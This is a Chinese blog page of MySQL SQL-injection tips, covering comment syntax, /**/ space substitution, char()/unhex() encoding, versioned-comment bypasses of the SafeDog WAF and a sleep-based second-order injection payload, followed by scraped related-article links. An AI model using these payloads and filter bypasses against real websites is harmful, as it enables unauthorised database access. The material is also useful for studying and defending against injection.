那些容易被忽略、容易被弄错的地方

sql注入时的技巧

=========================================================================

*	如果单引号被转义,在当前数据库采用GBK编码的前提下,可以考虑双字节注入。

*	注释符的正确用法

		“-- ”才是mysql中的注释,注意后面有个空格

		mysql> select  user()  from (select 1)x where  '1'='1';-- '

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

		“#”注释,后面接不接空格无所谓

		mysql> select  user()  from (select 1) x where  '1'='1';#'

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

*	用/**/替代空格

		mysql> select/**/1;

		+---+

		| 1 |

		+---+

		| 1 |

		+---+

		1 row in set (0.00 sec)

*	sql语句中字符串转义

	-	mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );

		+-------------------------------------------------------------------+

		| char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |

		+-------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                  |

		+-------------------------------------------------------------------+

		1 row in set (0.00 sec)

	-	mysql>  select  concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		| concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                                                                                                                    |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		1 row in set (0.00 sec)

		# utf-8

	-	mysql> select unhex('E6B8B8E5AEA2');

		+-----------------------+

		| unhex('E6B8B8E5AEA2') |

		+-----------------------+

		| 游客                  |

		+-----------------------+

		1 row in set (0.00 sec)

*	数字和字符的比较,类似php中的弱类型

	-	mysql> select '10asfasfdeasdfasdf'=10;

		+-------------------------+

		| '10asfasfdeasdfasdf'=10 |

		+-------------------------+

		|                       1 |

		+-------------------------+

	-	mysql> select '0esfsadf'=0;

		+--------------+

		| '0esfsadf'=0 |

		+--------------+

		|            1 |

		+--------------+

*	绕过安全狗

	**	正则绕过

		-	select 1/*!50000union/*!*//*!50000select/*!*/2;

				+---+

				| 1 |

				+---+

				| 1 |

				| 2 |

				+---+

		-	mysql> select/*/#\*/1;

				+---+

				| 1 |

				+---+

				| 1 |

				+---+

				1 row in set (0.00 sec)

*	多个单引号相连时,最外层两个孤独单引号配对闭合,中间的连续偶数个单引号中每两个一组换算成一个。

	-	mysql> select '123''';

			+------+

			| 123' |

			+------+

			| 123' |

			+------+

			1 row in set (0.00 sec)

	-	mysql> select '123''''';

			+-------+

			| 123'' |

			+-------+

			| 123'' |

			+-------+

	-	mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'

			Empty set (1.00 sec)

		此特点可以引发“二次注入”,比如,注册用户时输入昵称{nickname'},被转义为{nickname\'}但在插入到数据库后被还原,

		那么在需要将昵称作为查询条件的页面中就存在二次注入,另一个条件字段的值为{ or 0=sleep(1);#}即可触发。

  

sql注入时易被忽略的语法技巧以及二次注入的更多相关文章

  1. 【sql注入】简单实现二次注入

    [sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...

  2. sql手工注入时的探测技巧汇总

    工具的灵活性肯定比不上人,在手工探测的基础上再去自定义工具,才是正道. sql注入时手工探测技巧 =================================================== ...

  3. sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  4. 转:sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  5. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.二次注入也是 ...

  6. Sql 注入详解:宽字节注入+二次注入

    sql注入漏洞 原理:由于开发者在编写操作数据库代码时,直接将外部可控参数拼接到sql 语句中,没有经过任何过滤就直接放入到数据库引擎中执行了. 攻击方式: (1) 权限较大时,直接写入webshel ...

  7. Python连接MySQL数据库执行sql语句时的参数问题

    由于工作需要,今天写了一个Python小脚本,其中需要连接MySQL数据库,在执行sql命令时需要传递参数,结果出问题了.在网上查了一下,发现有以下几种方式传递参数: 一.直接把sql查询语句完整写入 ...

  8. ASPNETCOREAPI 跨域处理 SQL 语句拼接 多条件分页查询 ASPNET CORE 核心 通过依赖注入(注入服务)

    ASPNETCOREAPI 跨域处理 AspNetCoreApi 跨域处理 如果咱们有处理过MV5 跨域问题这个问题也不大. (1)为什么会出现跨域问题:  浏览器安全限制了前端脚本跨站点的访问资源, ...

  9. sql查询时增加自动编号和分页

    查询时加序号 a:没有主键的情形: ,) as iid,* into #tmp from TableName Select * from #tmp Drop table #tmp b:有主键的情形: ...

随机推荐

  1. POJ 2398 Toy Storage(计算几何)

    题意:给定一个如上的长方形箱子,中间有n条线段,将其分为n+1个区域,给定m个玩具的坐标,统计每个区域中的玩具个数. 题解:通过斜率判断一个点是否在两条线段之间. /** 通过斜率比较点是否在两线段之 ...

  2. 记一次从邻居无线路由渗透到邻居PC

    起因:因为房东的网太垃圾 决定自己动手丰衣足食蹭邻居的网 结果发现一个信号超好的无线路由0x01踩点 无意中发现TP-LINK_28C0这个无线信号特别的好 看起来就肯定知道是隔壁邻居的 抓了一下包 ...

  3. python2.7高级编程 笔记一(Python中的with语句与上下文管理器学习总结)

    0.关于上下文管理器上下文管理器是可以在with语句中使用,拥有__enter__和__exit__方法的对象. with manager as var: do_something(var) 相当于以 ...

  4. EF里的继承映射关系TPH、TPT和TPC的讲解以及一些具体的例子

    本章节讲解EF里的继承映射关系,分为TPH.TPT.TPC.具体: 1.TPH:Table Per Hierarchy 这是EF的默认的继承映射关系:一张表存放基类和子类的所有列,自动生成的discr ...

  5. 【Git】关于VSCode 内置Git问题

    VSCode的内置git是自动关联本机git的, 所以当提交代码时,VSCode提示[警告:请配置git用户名和账户]时, 只需要在git bash 端配置git config --gobal use ...

  6. ie11的DOM管理器报错

    IE11 Windows7下F12 DOC资源管理器不能用Exception in window.onload: Error: An error has ocurredJSPlugin.3005--- ...

  7. Xtrabackup原理及使用innobackupex进行MySQL数据库备份恢复

    Xtrabackup是由percona提供的mysql数据库备份工具,据官方介绍,这也是世界上惟一一款开源的能够对innodb和xtradb数据库进行热备的工具. Xtrabackup中主要包含两个工 ...

  8. 基于ArcGIS API for Javascript的地图编辑工具

    最近工作上需要用ArcGIS API for Javascript来开发一个浏览器上使用的地图编辑工具,分享一下一些相关的开发经验. 我开发的地图编辑工具是根据ESRI提供的例子修改而来的,参考的例子 ...

  9. 获取文件mime类型

    检测文件类型 finfo_file (PHP >= 5.3.0, PECL fileinfo >= 0.1.0) 修改php.ini,将extension=php_fileinfo.dll ...

  10. cocos2d-x 帧动画

    ani = cc.Animation:create(); ...... local animate = cc.Animate:create(ani); s:runAction(animate); 发现 ...